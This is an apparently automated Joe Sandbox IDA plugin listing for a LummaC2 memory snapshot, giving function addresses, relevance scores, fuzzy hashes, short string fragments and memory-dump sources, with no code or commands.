Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: C$CM$Egx|$RRP\$clfg$kj
API String ID: 0-2969717086
Opcode ID: 7205f9d9b45afb0796eec4366d0d469d1e374ff805331be11343e4905182765d
Instruction ID: f1442b7e15a71616c0e366b9544b28bb85eae235822ab51358fd3d2e7f62ed42
Opcode Fuzzy Hash: 7205f9d9b45afb0796eec4366d0d469d1e374ff805331be11343e4905182765d
Instruction Fuzzy Hash: AEC14A7110C3918FD315CF3984A07ABBBE29FD7315F188A6CE4E54B386D639490ACB52

Function 002D8095 Relevance: 7.6, Strings: 5, Instructions: 1319COMMON

Download Yara Rule

Strings

K, xrefs: 002D8162
(, xrefs: 002D82E1
d, xrefs: 002D8726
', xrefs: 002D9102
Q230, xrefs: 002D8B93

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: '$K$Q230$d$(
API String ID: 0-937174541
Opcode ID: 2a546b7a857872d5526333b71163191071af35b50f76bcb7611057f4eed46024
Instruction ID: 166a63d41101c995cf52611d54fe4b2ea521412a9235b876667ba221a406c0df
Opcode Fuzzy Hash: 2a546b7a857872d5526333b71163191071af35b50f76bcb7611057f4eed46024
Instruction Fuzzy Hash: DC9255716183428BD724CF28C8917ABB7E2EFD5314F18896EE5C98B391EB348D15CB52

Function 002E70F9 Relevance: 5.8, Strings: 4, Instructions: 802COMMON

Download Yara Rule

Strings

>.8, xrefs: 002E74AC
=&2), xrefs: 002E74BA
p, xrefs: 002E72D9
LL, xrefs: 002E72E0

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: p$=&2)$>.8$LL
API String ID: 0-1181295447
Opcode ID: 826d42b11049329f3dab067f5460feaa7e7a4f77ca9e7514f0d7b7d79d45e4a4
Instruction ID: fc5579ae6634bad5c19302aa435fd258521f5f3c675617d3a97a898155609eab
Opcode Fuzzy Hash: 826d42b11049329f3dab067f5460feaa7e7a4f77ca9e7514f0d7b7d79d45e4a4
Instruction Fuzzy Hash: 54422675A11612CFDB18CF29D85176EB7B2FF85310F18822DD859AB395DB34A821CF90

Function 002CC97C Relevance: 5.5, Strings: 4, Instructions: 533COMMON

Download Yara Rule

Strings

r~, xrefs: 002CD02F
zw, xrefs: 002CD019
1{, xrefs: 002CD024
?<, xrefs: 002CD0C2

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: 1{$?<$r~$zw
API String ID: 0-614760689
Opcode ID: a120caf467ddf0b5998a9d9fc2552bb63229b82cd86af45c9ba71cc96e1f18ea
Instruction ID: 2ec71d8b3835df05cfcfb6cc0da5c07b9bfe40aeaf824a71cd38cf34f90a3984
Opcode Fuzzy Hash: a120caf467ddf0b5998a9d9fc2552bb63229b82cd86af45c9ba71cc96e1f18ea
Instruction Fuzzy Hash: 1602BBB010D3C28AD735CF24D494BEFBBE1EBD6344F288A6DC4D99B242C77845468B92

Function 002DC205 Relevance: 5.5, Strings: 4, Instructions: 508COMMON

Download Yara Rule

Strings

./, xrefs: 002DC544
|r, xrefs: 002DC5CC
{x, xrefs: 002DC6B5
g`a, xrefs: 002DC864

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: ./${x$g`a$|r
API String ID: 0-1262855476
Opcode ID: 7c30655447764c2e37a62f666b159941cbe8bb81623097fd7fe2be22ed83497f
Instruction ID: 673e831628b5a588a085b952af5dadc89e3e39c8d22f2d77ba7f4f7165fd315c
Opcode Fuzzy Hash: 7c30655447764c2e37a62f666b159941cbe8bb81623097fd7fe2be22ed83497f
Instruction Fuzzy Hash: E0F11777A5C3109BD308DF699C4265FFAE2EBD4304F19C92DE8D49B345DA388A058B86

Function 002E59B0 Relevance: 5.4, Strings: 4, Instructions: 408COMMON

Download Yara Rule

Strings

!J, xrefs: 002E5A67
Y\, xrefs: 002E5A5F
U+, xrefs: 002E5A4F
/V, xrefs: 002E5A57

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: !J$/V$U+$Y\
API String ID: 0-2652480667
Opcode ID: 34139849e69734f29e96e03b2acb29e9103f4f7313e100934ca26e31f1f6316c
Instruction ID: 5e0a33e00735b7cb83cfb6f994a4fa46a9d55f08bb0a70f60c6b0d901eb5b119
Opcode Fuzzy Hash: 34139849e69734f29e96e03b2acb29e9103f4f7313e100934ca26e31f1f6316c
Instruction Fuzzy Hash: 7EE13FB5269344DFE3248F25E8A176BB7F5FB81304F94882DE6C54B262DB308815CF52

Function 002CAB20 Relevance: 5.4, Strings: 4, Instructions: 405COMMON

Download Yara Rule

Strings

tefr, xrefs: 002CADEE
a|}r, xrefs: 002CAC66
nww, xrefs: 002CAD87
tefr, xrefs: 002CAF78, 002CAD64, 002CAD20, 002CAED7, 002CAEE3, 002CAFAC, 002CAF81

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: a|}r$nww$tefr$tefr
API String ID: 0-1676423017
Opcode ID: 838c2d6fe869ba1ba1621d99040b3e98e3bcef54b87c0341604514a2c4e41ad5
Instruction ID: a64ab2f4b0d9ae920109c8863d7fc2f12df27dfbee503822170a398d7eef3ba9
Opcode Fuzzy Hash: 838c2d6fe869ba1ba1621d99040b3e98e3bcef54b87c0341604514a2c4e41ad5
Instruction Fuzzy Hash: 08C117B126C3554BC320EF2488517AFFBE2DBD1308F188A6CE4D58F341D676881A8B93

Function 002EC894 Relevance: 5.3, Strings: 4, Instructions: 308COMMON

Download Yara Rule

Strings

d, xrefs: 002ECACA
0, xrefs: 002ECB61
@, xrefs: 002ECBB3
^TFW, xrefs: 002ECC43

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: 0$@$^TFW$d
API String ID: 0-3517422908
Opcode ID: 23d7604a50c8254a8e7a3ce52b279e5de10daa16cf0eef94f5871c30a273d2da
Instruction ID: e85987faba6275aa325f657ab330bcfa99b2b0b04a1069f9e5ecbb17bbc594d3
Opcode Fuzzy Hash: 23d7604a50c8254a8e7a3ce52b279e5de10daa16cf0eef94f5871c30a273d2da
Instruction Fuzzy Hash: 3371377126C3C24BD319CF3A84A133BBBD1AFD6304FB8896EE4D68B391D67484168752

Function 002D64E0 Relevance: 5.2, Strings: 4, Instructions: 238COMMON

Download Yara Rule

Strings

pv, xrefs: 002D6702
L4, xrefs: 002D6570
tuz, xrefs: 002D670D
g-, xrefs: 002D67E1

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: g-$pv$tuz$L4
API String ID: 2994545307-2864509753
Opcode ID: c66d1a5ed4bdf7f970389d2a0fe12077b62b165c9eea04163bcb6fca96b751e4
Instruction ID: 9d3d0e4cbea721a6cfa9e62d5b6453e5779dc2b1caa9166d278c6e463ba2b5c0
Opcode Fuzzy Hash: c66d1a5ed4bdf7f970389d2a0fe12077b62b165c9eea04163bcb6fca96b751e4
Instruction Fuzzy Hash: 4D8130726193018BD7218F28DC947ABB3E6EFC4314F18893DD5898B395EB349D55CB42

Function 002CD35C Relevance: 5.1, APIs: 2, Strings: 1, Instructions: 625COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 002CD368
CoUninitialize.OLE32 ref: 002CD7A4

Strings

(P, xrefs: 002CD7B2

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID: Uninitialize
String ID: (P
API String ID: 3861434553-2012212641
Opcode ID: 5bdcafab397d2570970abe1f9f863515052da53cc639e4020be8cf0465c03d18
Instruction ID: b22bc6ac4d3a0ad7a8349a8c40105d14484278a87baaef233a215b87dff0f518
Opcode Fuzzy Hash: 5bdcafab397d2570970abe1f9f863515052da53cc639e4020be8cf0465c03d18
Instruction Fuzzy Hash: F722017155D3C28AD331CF39D490BEABFE0AF96308F188AADC4D95B242D735450ACB82

Function 002FA800 Relevance: 4.4, Strings: 3, Instructions: 638COMMON

Download Yara Rule

Strings

@Y?., xrefs: 002FAC15
<Y?., xrefs: 002FABDB
f, xrefs: 002FAA31

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: <Y?.$@Y?.$f
API String ID: 2994545307-3750340189
Opcode ID: 2ee9eff5ef0c1211171524c37078030d53fa645c1895fa532fffa5e71d419eb1
Instruction ID: 455d112a43ca916ded37e1c288b41b7a199d8c9027c6b5ce46ae99fc8a3d4a6a
Opcode Fuzzy Hash: 2ee9eff5ef0c1211171524c37078030d53fa645c1895fa532fffa5e71d419eb1
Instruction Fuzzy Hash: 212223B06193458FD314CF28C890A3BFBE2BB98354F188A3CE6D987392D631DC158B52

Function 002C9710 Relevance: 4.1, Strings: 3, Instructions: 395COMMON

Download Yara Rule

Strings

v~, xrefs: 002C9A04
p, xrefs: 002C9936
HVKG, xrefs: 002C97A0

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: HVKG$p$v~
API String ID: 0-1862922427
Opcode ID: 659e5a8626b081fe91d6a3d00dd5b00804ad3031128a79f0459785d551972592
Instruction ID: 6a3f1b407b4233b8cfc065a05efecbb4e54d865e6de59ec9208a8941719747f5
Opcode Fuzzy Hash: 659e5a8626b081fe91d6a3d00dd5b00804ad3031128a79f0459785d551972592
Instruction Fuzzy Hash: 86B1467061C7408BE314CF65D895BABBBE5EBD2314F144A6CE0E18B392D778D90ACB52

Function 002EBF45 Relevance: 4.1, Strings: 3, Instructions: 336COMMON

Download Yara Rule

Strings

u, xrefs: 002EC364
L,2H, xrefs: 002EBF4D
@a, xrefs: 002EC2AF

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: @a$L,2H$u
API String ID: 0-2528062038
Opcode ID: 63096bd22ac8e38d88bba79705e16a772312289b1617b9e8dbea26ca78426985
Instruction ID: f519cc692a5a8ff5a9d19e049649d0f8c886c1dcccf08af7ba08909686b8318c
Opcode Fuzzy Hash: 63096bd22ac8e38d88bba79705e16a772312289b1617b9e8dbea26ca78426985
Instruction Fuzzy Hash: 6A91E27051C3C18FD72ACF3A84607ABBBE1AFA7304F68499DE4D997282D7358506CB16

Function 002EC984 Relevance: 4.1, Strings: 3, Instructions: 301COMMON

Download Yara Rule

Strings

d, xrefs: 002ECACA
@, xrefs: 002ECBB3
^TFW, xrefs: 002ECC43

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: @$^TFW$d
API String ID: 0-3772873652
Opcode ID: ee6e8501df26c721c883361204f5dfdea21cade5b403e7a1c6cdd88a265d0b4c
Instruction ID: 831fb792233718def18e51642f7adfb0429304dc356092ee5c54bbc3a9ab827e
Opcode Fuzzy Hash: ee6e8501df26c721c883361204f5dfdea21cade5b403e7a1c6cdd88a265d0b4c
Instruction Fuzzy Hash: 9771377025C3C24BD3188F3A84A133BBFD19FD6304FB8896EE4D68B391D67484168B52

Function 002EC9E9 Relevance: 4.0, Strings: 3, Instructions: 300COMMON

Download Yara Rule

Strings

d, xrefs: 002ECACA
@, xrefs: 002ECBB3
^TFW, xrefs: 002ECC43

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: @$^TFW$d
API String ID: 0-3772873652
Opcode ID: 241e56441a5956caad34d4193a514d31182223ac473f41f5195153ff867217ef
Instruction ID: 4a39b15758080fea1bdc29ccad4aefabcce6f313772a67626405d6e979ba631f
Opcode Fuzzy Hash: 241e56441a5956caad34d4193a514d31182223ac473f41f5195153ff867217ef
Instruction Fuzzy Hash: 2571267125C3C24BD318CF3A84A133BBBD1AFD6304FB8996EE4D68B391D67484568B52

Function 002EC9DA Relevance: 4.0, Strings: 3, Instructions: 274COMMON

Download Yara Rule

Strings

d, xrefs: 002ECACA
@, xrefs: 002ECBB3
^TFW, xrefs: 002ECC43

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: @$^TFW$d
API String ID: 0-3772873652
Opcode ID: e1066b07f9aa922388ca0a47273df9b2cb7fc6a88e5b352909908a20ab82b233
Instruction ID: be20ef6105f43911f898b2b3a92533814474ba12cf5a5ae4feb6b42c61317cfd
Opcode Fuzzy Hash: e1066b07f9aa922388ca0a47273df9b2cb7fc6a88e5b352909908a20ab82b233
Instruction Fuzzy Hash: 5F6147A115C3C24BD318CF3A84A133BFFD19FE6304FB8996EE4D68B291D27485168B52

Function 002E5640 Relevance: 4.0, Strings: 3, Instructions: 267COMMON

Download Yara Rule

Strings

)G, xrefs: 002E58D4
AF, xrefs: 002E58DC
O6E4, xrefs: 002E593D, 002E594C

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: )G$AF$O6E4
API String ID: 0-708911115
Opcode ID: 8ec6d81a368636483f53a5262d03c7df6d3968ac354951764ba2c7921f2d5c37
Instruction ID: 6fc92c55605137b41b9cfd3e195096d1378fdf525696e950c020b7ec75b0c3ce
Opcode Fuzzy Hash: 8ec6d81a368636483f53a5262d03c7df6d3968ac354951764ba2c7921f2d5c37
Instruction Fuzzy Hash: 998179716283618BC714DF15C8913ABB7E2FFD1314F49891CE4C58B391EB798915CB92

Function 002D720B Relevance: 3.4, Strings: 2, Instructions: 890COMMON

Download Yara Rule

Strings

!, xrefs: 002D78E5
1, xrefs: 002D7631

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: !$1
API String ID: 2994545307-1727534169
Opcode ID: bade642382f9160612ee5ad25511783a3f4f9df30add4153c9699987a65db7ff
Instruction ID: 76d5657470c07a3815a8e6d6fe472d695754f36013b03484bcd5bdbe533e0b65
Opcode Fuzzy Hash: bade642382f9160612ee5ad25511783a3f4f9df30add4153c9699987a65db7ff
Instruction Fuzzy Hash: CD22677161C3828FD7268F24D8A173BB7E6EB96304F18496ED5C687352E7388D12CB52

Function 002C4C50 Relevance: 3.3, Strings: 2, Instructions: 812COMMON

Download Yara Rule

Strings

8, xrefs: 002C5592
0, xrefs: 002C559A

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 51d02370513dceb54b4c3714ab2ca68485b079d0c2a35a72593adff685fef970
Instruction ID: 7801a5b5b57e9d103b08c87336f3f3ea946b700b0cbd6df3f08fbea51c02c7bc
Opcode Fuzzy Hash: 51d02370513dceb54b4c3714ab2ca68485b079d0c2a35a72593adff685fef970
Instruction Fuzzy Hash: E07258716183419FD710CF18C890BABBBE1BF98314F048A1DF98987391D775E9A8CB92

Function 002DCC60 Relevance: 3.0, Strings: 2, Instructions: 493COMMON

Download Yara Rule

Strings

06i`, xrefs: 002DD13A
46i`, xrefs: 002DD104

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: 06i`$46i`
API String ID: 0-253969996
Opcode ID: 9f8bef7e76f0038eadc2f63056b9aad0b87424077a0de5caea3531744662dc42
Instruction ID: 442e175e54e23122542789d0960168ca83dc55b7ca32efedca079cf12bb5c649
Opcode Fuzzy Hash: 9f8bef7e76f0038eadc2f63056b9aad0b87424077a0de5caea3531744662dc42
Instruction Fuzzy Hash: 64D12676A283128BC724CF29CC513ABB7E2EFD5310F188A2DE8D58B394E7749905C791

Function 002F80C5 Relevance: 2.9, Strings: 2, Instructions: 443COMMON

Download Yara Rule

Strings

:, xrefs: 002F85B4
NO, xrefs: 002F8378

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: :$NO
API String ID: 0-151983983
Opcode ID: bccdd7c6510be7ec0fbd947112694767338360d95649295eef4d33dc4dcbf88e
Instruction ID: 037a44cad7ec21ad30d67c423171db00cdc7faa6e85ad7caeae0291f029a5b1a
Opcode Fuzzy Hash: bccdd7c6510be7ec0fbd947112694767338360d95649295eef4d33dc4dcbf88e
Instruction Fuzzy Hash: 02D13637629256CBCB189F78DC2126AB3F6FF88351F0A8C7DD541872A0EB39D9608750

Function 002FE540 Relevance: 2.8, Strings: 2, Instructions: 341COMMON

Download Yara Rule

Strings

